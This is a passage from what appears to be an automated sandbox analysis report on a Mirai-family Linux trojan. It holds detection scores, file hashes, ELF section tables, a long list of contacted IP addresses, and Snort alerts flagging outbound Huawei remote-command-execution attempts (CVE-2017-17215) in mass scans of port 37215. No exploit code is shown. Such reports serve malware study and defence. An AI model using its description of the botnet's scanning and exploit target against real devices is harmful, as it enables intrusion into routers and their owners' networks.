              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
              Non-Standard Port
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830809 Sample: 8oxYPvmeaT.elf Startdate: 20/03/2023 Architecture: LINUX Score: 92 27 41.203.76.44, 37215 globacom-asNG Nigeria 2->27 29 197.152.252.82 airtel-tz-asTZ Tanzania United Republic of 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 4 other signatures 2->39 8 8oxYPvmeaT.elf 2->8         started        signatures3 process4 process5 10 8oxYPvmeaT.elf sh 8->10         started        12 8oxYPvmeaT.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 8oxYPvmeaT.elf 12->23         started        25 8oxYPvmeaT.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41
              SourceDetectionScannerLabelLink
              8oxYPvmeaT.elf59%ReversingLabsLinux.Trojan.Mirai
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/8oxYPvmeaT.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/8oxYPvmeaT.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  157.194.27.25
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  164.191.52.223
                  unknownUnited States
                  668DNIC-AS-00668USfalse
                  12.149.18.17
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  157.112.136.32
                  unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                  197.14.36.251
                  unknownTunisia
                  37693TUNISIANATNfalse
                  157.161.130.142
                  unknownSwitzerland
                  6772IMPNET-ASCHfalse
                  34.39.73.212
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  197.6.201.4
                  unknownTunisia
                  5438ATI-TNfalse
                  41.30.144.223
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  157.227.30.118
                  unknownAustralia
                  4704SANNETRakutenMobileIncJPfalse
                  183.165.208.173
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  197.211.114.11
                  unknownMalawi
                  37187SKYBANDMWfalse
                  157.46.135.120
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  43.61.37.90
                  unknownJapan4249LILLY-ASUSfalse
                  41.71.209.81
                  unknownNigeria
                  37053RSAWEB-ASZAfalse
                  197.222.169.246
                  unknownEgypt
                  37069MOBINILEGfalse
                  157.12.245.236
                  unknownJapan24275TOTOTOTOLTDJPfalse
                  49.27.74.83
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  195.155.10.105
                  unknownTurkey
                  33548UNWIRED-NOCUSfalse
                  157.49.72.74
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  197.78.0.1
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  39.223.204.218
                  unknownIndonesia
                  23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                  157.198.38.197
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  157.168.205.61
                  unknownSwitzerland
                  22192SSHENETUSfalse
                  19.78.174.40
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  157.155.206.238
                  unknownAustralia
                  17983COLESMYER-AS-APColesMyerAUfalse
                  157.37.178.102
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  41.251.165.136
                  unknownMorocco
                  36903MT-MPLSMAfalse
                  41.248.85.208
                  unknownMorocco
                  36903MT-MPLSMAfalse
                  197.70.186.100
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  82.178.96.254
                  unknownOman
                  28885OMANTEL-NAP-ASOmanTelNAPOMfalse
                  41.243.103.130
                  unknownCongo The Democratic Republic of The
                  37684ANGANI-ASKEfalse
                  4.16.178.189
                  unknownUnited States
                  3356LEVEL3USfalse
                  163.160.5.14
                  unknownUnited Kingdom
                  786JANETJiscServicesLimitedGBfalse
                  197.13.254.9
                  unknownTunisia
                  37504MeninxTNfalse
                  41.198.255.166
                  unknownSouth Africa
                  328306Avanti-ASZAfalse
                  197.180.107.86
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  197.47.156.137
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  113.20.31.99
                  unknownIndonesia
                  45731ARDH-AS-IDARDHGLOBALINDONESIAPTIDfalse
                  222.30.135.42
                  unknownChina
                  4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                  197.217.148.151
                  unknownAngola
                  11259ANGOLATELECOMAOfalse
                  197.152.252.82
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  157.208.226.55
                  unknownUnited States
                  12552IPO-EUSEfalse
                  52.248.235.152
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  150.34.187.3
                  unknownJapan9991SHUDO-UHiroshimaShudoUniversityJPfalse
                  197.251.97.136
                  unknownSudan
                  37197SUDRENSDfalse
                  157.83.166.153
                  unknownUnited Kingdom
                  2501UTNETTheUniversityofTokyoJPfalse
                  197.46.254.206
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  41.203.76.44
                  unknownNigeria
                  37148globacom-asNGfalse
                  99.126.165.25
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  178.104.135.152
                  unknownUnited Kingdom
                  12576EELtdGBfalse
                  157.198.196.23
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  197.41.45.220
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  197.69.11.67
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  112.243.208.153
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  197.192.17.254
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  80.179.209.1
                  unknownIsrael
                  9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
                  157.148.141.20
                  unknownChina
                  17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                  140.162.250.197
                  unknownUnited States
                  19LEIDOS-ASUSfalse
                  17.3.75.80
                  unknownUnited States
                  714APPLE-ENGINEERINGUSfalse
                  41.40.71.188
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  197.149.52.182
                  unknownMadagascar
                  37054Telecom-MalagasyMGfalse
                  170.41.187.237
                  unknownUnited States
                  26034ASN-DELTA-OUTUSfalse
                  157.181.65.107
                  unknownHungary
                  2012ELTENETELTENETHUfalse
                  157.35.127.105
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  156.235.142.169
                  unknownSeychelles
                  134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                  157.245.170.67
                  unknownUnited States
                  14061DIGITALOCEAN-ASNUSfalse
                  41.57.232.93
                  unknownGhana
                  37103BUSYINTERNETGHfalse
                  157.105.195.243
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  43.57.106.108
                  unknownJapan4249LILLY-ASUSfalse
                  197.30.41.154
                  unknownTunisia
                  37492ORANGE-TNfalse
                  41.134.159.142
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  41.183.9.45
                  unknownSouth Africa
                  37028FNBCONNECTZAfalse
                  157.181.106.8
                  unknownHungary
                  2012ELTENETELTENETHUfalse
                  185.78.207.38
                  unknownUnited Kingdom
                  8426CLARANET-ASClaraNETLTDGBfalse
                  157.105.172.38
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  197.100.219.48
                  unknownSouth Africa
                  3741ISZAfalse
                  197.65.82.70
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  41.5.88.210
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  197.94.15.28
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  197.27.94.143
                  unknownTunisia
                  37492ORANGE-TNfalse
                  197.159.106.179
                  unknownKenya
                  37421CellulantKEfalse
                  157.90.191.238
                  unknownUnited States
                  766REDIRISRedIRISAutonomousSystemESfalse
                  41.26.72.131
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  44.216.170.224
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  201.35.92.211
                  unknownBrazil
                  8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                  157.254.215.181
                  unknownUnited States
                  7768TECHNICOLORUSfalse
                  197.179.229.85
                  unknownKenya
                  33771SAFARICOM-LIMITEDKEfalse
                  193.60.87.140
                  unknownUnited Kingdom
                  786JANETJiscServicesLimitedGBfalse
                  176.137.7.219
                  unknownFrance
                  5410BOUYGTEL-ISPFRfalse
                  197.220.165.29
                  unknownGhana
                  37341GLOMOBILEGHfalse
                  197.99.16.216
                  unknownSouth Africa
                  3741ISZAfalse
                  41.170.26.88
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  41.65.28.123
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  197.186.206.34
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  62.242.162.199
                  unknownDenmark
                  3292TDCTDCASDKfalse
                  27.101.71.172
                  unknownKorea Republic of
                  17841NCIA-AS-KRNATIONALINFORMATIONRESOURCESSERVICEKRfalse
                  19.216.213.107
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  84.235.213.206
                  unknownGermany
                  16360SATLYNX_GMBHDEfalse
                  63.5.159.46
                  unknownUnited States
                  701UUNETUSfalse
                  No context
                  No context
                  No context
                  No context
                  No context
                  No created / dropped files found
                  File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                  Entropy (8bit):6.782408732859346
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:8oxYPvmeaT.elf
                  File size:58740
                  MD5:4b9afff9b19166f6e9ee490e32e0fb15
                  SHA1:31d41fd14ab0b236e2802e774c6f601f329d152e
                  SHA256:e3fde73a75a23deb0a08b00b153097005ee62bca9969c37755557614efca9f80
                  SHA512:46d3b5135db849d7a93c2fe314396c6668c8a5c96a23c2a8b393ed2bac2131c785ec44470e930314a984941554c76d6a72705287ddccc6912c3954263983f589
                  SSDEEP:1536:Vaa0brW/Od9hlCR3KajKYXwKEpPDCMC2+WK:Vv0brWGd9X5aGYypPDL+v
                  TLSH:A6438D37E96E1E74C04641B074748EB56F23B5C883972EB61AAAC2795483E9CF504FF8
                  File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@.H...H.....................A...A.x....%..........Q.td............................././"O.n........#.*@........#.*@l....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                  ELF header

                  Class:
                  Data:
                  Version:
                  Machine:
                  Version Number:
                  Type:
                  OS/ABI:
                  ABI Version:
                  Entry Point Address:
                  Flags:
                  ELF Header Size:
                  Program Header Offset:
                  Program Header Size:
                  Number of Program Headers:
                  Section Header Offset:
                  Section Header Size:
                  Number of Section Headers:
                  Header String Table Index:
                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x4000940x940x300x00x6AX004
                  .textPROGBITS0x4000e00xe00xbd800x00x6AX0032
                  .finiPROGBITS0x40be600xbe600x240x00x6AX004
                  .rodataPROGBITS0x40be840xbe840x1dc40x00x2A004
                  .ctorsPROGBITS0x41e0000xe0000x80x00x3WA004
                  .dtorsPROGBITS0x41e0080xe0080x80x00x3WA004
                  .dataPROGBITS0x41e0140xe0140x3540x00x3WA004
                  .gotPROGBITS0x41e3680xe3680x100x40x3WA004
                  .bssNOBITS0x41e3780xe3780x22140x00x3WA004
                  .shstrtabSTRTAB0x00xe3780x430x00x0001
                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x4000000x4000000xdc480xdc486.90260x5R E0x10000.init .text .fini .rodata
                  LOAD0xe0000x41e0000x41e0000x3780x258c2.73130x6RW 0x10000.ctors .dtors .data .got .bss
                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.23197.3.233.17434126372152835222 03/20/23-17:55:45.971245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412637215192.168.2.23197.3.233.174
                  192.168.2.23177.177.96.5145106372152835222 03/20/23-17:55:17.129201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510637215192.168.2.23177.177.96.51
                  192.168.2.2341.236.128.17155800372152835222 03/20/23-17:55:01.346736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580037215192.168.2.2341.236.128.171
                  192.168.2.23197.39.127.1246968372152835222 03/20/23-17:55:10.843812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696837215192.168.2.23197.39.127.12
                  192.168.2.2341.236.89.23756078372152835222 03/20/23-17:55:31.621522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607837215192.168.2.2341.236.89.237
                  TimestampSource PortDest PortSource IPDest IP
                  Mar 20, 2023 17:53:46.586987972 CET42836443192.168.2.2391.189.91.43
                  Mar 20, 2023 17:53:46.843039989 CET4251680192.168.2.23109.202.202.202
                  Mar 20, 2023 17:53:48.810013056 CET2791237215192.168.2.2396.126.75.168
                  Mar 20, 2023 17:53:48.810107946 CET2791237215192.168.2.23135.29.85.160
                  Mar 20, 2023 17:53:48.810225010 CET2791237215192.168.2.23157.165.157.167
                  Mar 20, 2023 17:53:48.810273886 CET2791237215192.168.2.23197.218.72.255
                  Mar 20, 2023 17:53:48.810333014 CET2791237215192.168.2.2341.111.232.41
                  Mar 20, 2023 17:53:48.810388088 CET2791237215192.168.2.23180.215.178.223
                  Mar 20, 2023 17:53:48.810420036 CET2791237215192.168.2.23197.95.212.145
                  Mar 20, 2023 17:53:48.810487032 CET2791237215192.168.2.23157.139.208.17
                  Mar 20, 2023 17:53:48.810508966 CET2791237215192.168.2.23197.166.32.51
                  Mar 20, 2023 17:53:48.810525894 CET2791237215192.168.2.23157.50.201.94
                  Mar 20, 2023 17:53:48.810551882 CET2791237215192.168.2.2338.214.124.88
                  Mar 20, 2023 17:53:48.810601950 CET2791237215192.168.2.23197.207.197.234
                  Mar 20, 2023 17:53:48.810616970 CET2791237215192.168.2.2397.188.19.223
                  Mar 20, 2023 17:53:48.810663939 CET2791237215192.168.2.2347.173.204.30
                  Mar 20, 2023 17:53:48.810673952 CET2791237215192.168.2.23197.111.253.197
                  Mar 20, 2023 17:53:48.810733080 CET2791237215192.168.2.2341.116.217.181
                  Mar 20, 2023 17:53:48.810924053 CET2791237215192.168.2.23197.201.40.22
                  Mar 20, 2023 17:53:48.810924053 CET2791237215192.168.2.23197.156.89.127
                  Mar 20, 2023 17:53:48.810956955 CET2791237215192.168.2.2341.163.203.95
                  Mar 20, 2023 17:53:48.811001062 CET2791237215192.168.2.23180.16.78.227
                  Mar 20, 2023 17:53:48.811034918 CET2791237215192.168.2.23197.142.183.154
                  Mar 20, 2023 17:53:48.811084032 CET2791237215192.168.2.23157.201.23.58
                  Mar 20, 2023 17:53:48.811137915 CET2791237215192.168.2.23157.124.5.18
                  Mar 20, 2023 17:53:48.811142921 CET2791237215192.168.2.23197.205.217.145
                  Mar 20, 2023 17:53:48.811194897 CET2791237215192.168.2.23197.24.45.221
                  Mar 20, 2023 17:53:48.811217070 CET2791237215192.168.2.2341.145.240.122
                  Mar 20, 2023 17:53:48.811229944 CET2791237215192.168.2.23157.157.101.174
                  Mar 20, 2023 17:53:48.811614990 CET2791237215192.168.2.23197.11.97.13
                  Mar 20, 2023 17:53:48.811614990 CET2791237215192.168.2.23109.189.48.21
                  Mar 20, 2023 17:53:48.811614990 CET2791237215192.168.2.2341.114.172.204
                  Mar 20, 2023 17:53:48.811639071 CET2791237215192.168.2.23201.161.74.244
                  Mar 20, 2023 17:53:48.811674118 CET2791237215192.168.2.2341.122.69.72
                  Mar 20, 2023 17:53:48.811674118 CET2791237215192.168.2.23157.123.180.115
                  Mar 20, 2023 17:53:48.811674118 CET2791237215192.168.2.2336.47.88.65
                  Mar 20, 2023 17:53:48.811727047 CET2791237215192.168.2.2341.128.254.123
                  Mar 20, 2023 17:53:48.811742067 CET2791237215192.168.2.23157.95.27.19
                  Mar 20, 2023 17:53:48.811742067 CET2791237215192.168.2.23197.21.137.84
                  Mar 20, 2023 17:53:48.811743021 CET2791237215192.168.2.23157.82.218.221
                  Mar 20, 2023 17:53:48.811754942 CET2791237215192.168.2.23197.236.249.120
                  Mar 20, 2023 17:53:48.811810017 CET2791237215192.168.2.23157.161.177.81
                  Mar 20, 2023 17:53:48.811867952 CET2791237215192.168.2.23197.236.123.21
                  Mar 20, 2023 17:53:48.811872005 CET2791237215192.168.2.23157.12.198.165
                  Mar 20, 2023 17:53:48.811875105 CET2791237215192.168.2.23197.225.81.170
                  Mar 20, 2023 17:53:48.811877966 CET2791237215192.168.2.23157.94.171.198
                  Mar 20, 2023 17:53:48.811956882 CET2791237215192.168.2.23157.156.120.144
                  Mar 20, 2023 17:53:48.811956882 CET2791237215192.168.2.232.45.60.100
                  Mar 20, 2023 17:53:48.811961889 CET2791237215192.168.2.23110.144.113.240
                  Mar 20, 2023 17:53:48.812010050 CET2791237215192.168.2.23197.108.69.86
                  Mar 20, 2023 17:53:48.812036991 CET2791237215192.168.2.23157.227.88.248
                  Mar 20, 2023 17:53:48.812083960 CET2791237215192.168.2.2341.44.78.95
                  Mar 20, 2023 17:53:48.812114000 CET2791237215192.168.2.23197.81.48.189
                  Mar 20, 2023 17:53:48.812140942 CET2791237215192.168.2.2340.80.174.74
                  Mar 20, 2023 17:53:48.812159061 CET2791237215192.168.2.232.111.198.123
                  Mar 20, 2023 17:53:48.812221050 CET2791237215192.168.2.2341.255.36.90
                  Mar 20, 2023 17:53:48.812294006 CET2791237215192.168.2.23197.50.101.243
                  Mar 20, 2023 17:53:48.812318087 CET2791237215192.168.2.23157.123.4.78
                  Mar 20, 2023 17:53:48.812352896 CET2791237215192.168.2.2341.225.73.200
                  Mar 20, 2023 17:53:48.812356949 CET2791237215192.168.2.2339.191.83.175
                  Mar 20, 2023 17:53:48.812383890 CET2791237215192.168.2.23196.204.13.200
                  Mar 20, 2023 17:53:48.812480927 CET2791237215192.168.2.2341.188.20.30
                  Mar 20, 2023 17:53:48.812510014 CET2791237215192.168.2.23197.76.247.141
                  Mar 20, 2023 17:53:48.812514067 CET2791237215192.168.2.23197.239.100.144
                  Mar 20, 2023 17:53:48.812514067 CET2791237215192.168.2.23157.164.226.149
                  Mar 20, 2023 17:53:48.812546968 CET2791237215192.168.2.23157.78.236.201
                  Mar 20, 2023 17:53:48.812556028 CET2791237215192.168.2.23157.228.175.174
                  Mar 20, 2023 17:53:48.812568903 CET2791237215192.168.2.23197.82.51.10
                  Mar 20, 2023 17:53:48.812611103 CET2791237215192.168.2.23157.147.99.205
                  Mar 20, 2023 17:53:48.812664986 CET2791237215192.168.2.23197.139.143.169
                  Mar 20, 2023 17:53:48.812705994 CET2791237215192.168.2.23157.65.111.193
                  Mar 20, 2023 17:53:48.812803030 CET2791237215192.168.2.2341.176.160.201
                  Mar 20, 2023 17:53:48.812808990 CET2791237215192.168.2.2341.4.101.121
                  Mar 20, 2023 17:53:48.812825918 CET2791237215192.168.2.239.195.101.185
                  Mar 20, 2023 17:53:48.812828064 CET2791237215192.168.2.2341.116.244.247
                  Mar 20, 2023 17:53:48.812828064 CET2791237215192.168.2.23197.92.66.176
                  Mar 20, 2023 17:53:48.812968016 CET2791237215192.168.2.2341.168.41.162
                  Mar 20, 2023 17:53:48.812969923 CET2791237215192.168.2.23213.30.91.89
                  Mar 20, 2023 17:53:48.812969923 CET2791237215192.168.2.2341.23.31.235
                  Mar 20, 2023 17:53:48.812969923 CET2791237215192.168.2.23141.244.247.254
                  Mar 20, 2023 17:53:48.813102961 CET2791237215192.168.2.23157.181.4.135
                  Mar 20, 2023 17:53:48.813117027 CET2791237215192.168.2.23197.156.112.247
                  Mar 20, 2023 17:53:48.813122988 CET2791237215192.168.2.2342.108.113.215
                  Mar 20, 2023 17:53:48.813142061 CET2791237215192.168.2.23197.156.200.110
                  Mar 20, 2023 17:53:48.813179016 CET2791237215192.168.2.23132.38.63.3
                  Mar 20, 2023 17:53:48.813214064 CET2791237215192.168.2.2341.130.226.168
                  Mar 20, 2023 17:53:48.813214064 CET2791237215192.168.2.2363.205.49.94
                  Mar 20, 2023 17:53:48.813242912 CET2791237215192.168.2.23197.234.30.87
                  Mar 20, 2023 17:53:48.813312054 CET2791237215192.168.2.2341.134.251.217
                  Mar 20, 2023 17:53:48.813333988 CET2791237215192.168.2.23157.55.83.14
                  Mar 20, 2023 17:53:48.813349009 CET2791237215192.168.2.23197.205.159.13
                  Mar 20, 2023 17:53:48.813349009 CET2791237215192.168.2.2341.124.149.202
                  Mar 20, 2023 17:53:48.813373089 CET2791237215192.168.2.2341.108.99.38
                  Mar 20, 2023 17:53:48.813448906 CET2791237215192.168.2.23195.100.127.248
                  Mar 20, 2023 17:53:48.813503981 CET2791237215192.168.2.2341.53.203.220
                  Mar 20, 2023 17:53:48.813520908 CET2791237215192.168.2.2341.123.49.231
                  Mar 20, 2023 17:53:48.813520908 CET2791237215192.168.2.2369.85.242.189
                  Mar 20, 2023 17:53:48.813527107 CET2791237215192.168.2.23157.75.34.149
                  Mar 20, 2023 17:53:48.813628912 CET2791237215192.168.2.23157.160.89.137
                  Mar 20, 2023 17:53:48.813735008 CET2791237215192.168.2.2370.168.214.134
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Mar 20, 2023 17:53:48.765808105 CET192.168.2.238.8.8.80x6bd4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.786621094 CET192.168.2.238.8.8.80x6bd4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.805180073 CET192.168.2.238.8.8.80x6bd4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.823740005 CET192.168.2.238.8.8.80x6bd4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:48.841442108 CET192.168.2.238.8.8.80x6bd4Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.861957073 CET192.168.2.238.8.8.80xd7feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.882245064 CET192.168.2.238.8.8.80xd7feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.902170897 CET192.168.2.238.8.8.80xd7feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.922446012 CET192.168.2.238.8.8.80xd7feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:53:52.940380096 CET192.168.2.238.8.8.80xd7feStandard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:00.960326910 CET192.168.2.238.8.8.80x29a5Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:00.980664968 CET192.168.2.238.8.8.80x29a5Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:00.999131918 CET192.168.2.238.8.8.80x29a5Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:01.019154072 CET192.168.2.238.8.8.80x29a5Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:01.036737919 CET192.168.2.238.8.8.80x29a5Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.057385921 CET192.168.2.238.8.8.80xe94Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.077071905 CET192.168.2.238.8.8.80xe94Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.097317934 CET192.168.2.238.8.8.80xe94Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.117475986 CET192.168.2.238.8.8.80xe94Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:08.137413025 CET192.168.2.238.8.8.80xe94Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.159239054 CET192.168.2.238.8.8.80xe218Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.179145098 CET192.168.2.238.8.8.80xe218Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.199134111 CET192.168.2.238.8.8.80xe218Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.217591047 CET192.168.2.238.8.8.80xe218Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:13.236219883 CET192.168.2.238.8.8.80xe218Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.254884958 CET192.168.2.238.8.8.80xaba2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.273684025 CET192.168.2.238.8.8.80xaba2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.294823885 CET192.168.2.238.8.8.80xaba2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.313052893 CET192.168.2.238.8.8.80xaba2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:16.337908983 CET192.168.2.238.8.8.80xaba2Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.359266996 CET192.168.2.238.8.8.80x4b33Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.379901886 CET192.168.2.238.8.8.80x4b33Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.400691986 CET192.168.2.238.8.8.80x4b33Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.418754101 CET192.168.2.238.8.8.80x4b33Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:18.439063072 CET192.168.2.238.8.8.80x4b33Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.458336115 CET192.168.2.238.8.8.80xab48Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.476732969 CET192.168.2.238.8.8.80xab48Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.495090961 CET192.168.2.238.8.8.80xab48Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.513151884 CET192.168.2.238.8.8.80xab48Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:27.533427954 CET192.168.2.238.8.8.80xab48Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.551873922 CET192.168.2.238.8.8.80xe516Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.570219040 CET192.168.2.238.8.8.80xe516Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.588200092 CET192.168.2.238.8.8.80xe516Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.607949018 CET192.168.2.238.8.8.80xe516Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:28.626174927 CET192.168.2.238.8.8.80xe516Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.644567013 CET192.168.2.238.8.8.80x6432Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.664761066 CET192.168.2.238.8.8.80x6432Standard query (0)BC@^]BA (IP address)IN (0x0001)false
                  Mar 20, 2023 17:54:31.684782982 CET192.168.2.238.8.8.80x6432Standard query (0)BC@^]BA (IP address)IN (0x0001)false
